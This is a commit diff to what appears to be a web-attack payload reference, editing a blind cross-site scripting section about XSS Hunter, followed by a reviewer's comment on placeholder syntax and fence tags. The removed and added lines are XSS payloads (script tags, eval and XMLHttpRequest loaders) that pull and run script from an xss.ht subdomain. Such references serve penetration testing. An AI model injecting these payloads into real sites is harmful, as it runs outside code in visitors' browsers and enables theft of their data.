ADFS Golden SAML

Swissky
2022-11-07 10:10:21 +01:00
parent c17ae602fc
commit 3e9ef2efbe
7 changed files with 73 additions and 12 deletions

@@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https:
> XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
```javascript
"><script src=//yoursubdomain.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
<script>$.getScript("//yoursubdomain.xss.ht")</script>
```xml
"><script src=//<your.subdomain>.xss.ht></script>
<script>$.getScript("//<your.subdomain>.xss.ht")</script>
```
### Other Blind XSS tools
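Review bot: The `<your.subdomain>` placeholder in the `xml`-tagged fence puts angle brackets inside lines that are themselves HTML, so a reader cannot tell the placeholder from markup. The `yoursubdomain` form in the `javascript`-tagged lines is unambiguous, and an uppercase token such as `YOUR_SUBDOMAIN` would also work. The fence tag `xml` does not match the content, which is HTML script tags; `html` would be the accurate tag. The hunk header context says XSS Hunter is deprecated, so a short line stating that the `xss.ht` host is kept for reference only would keep the section consistent with that statement. This edit is also unrelated to the commit title "ADFS Golden SAML" and would be easier to track as its own commit.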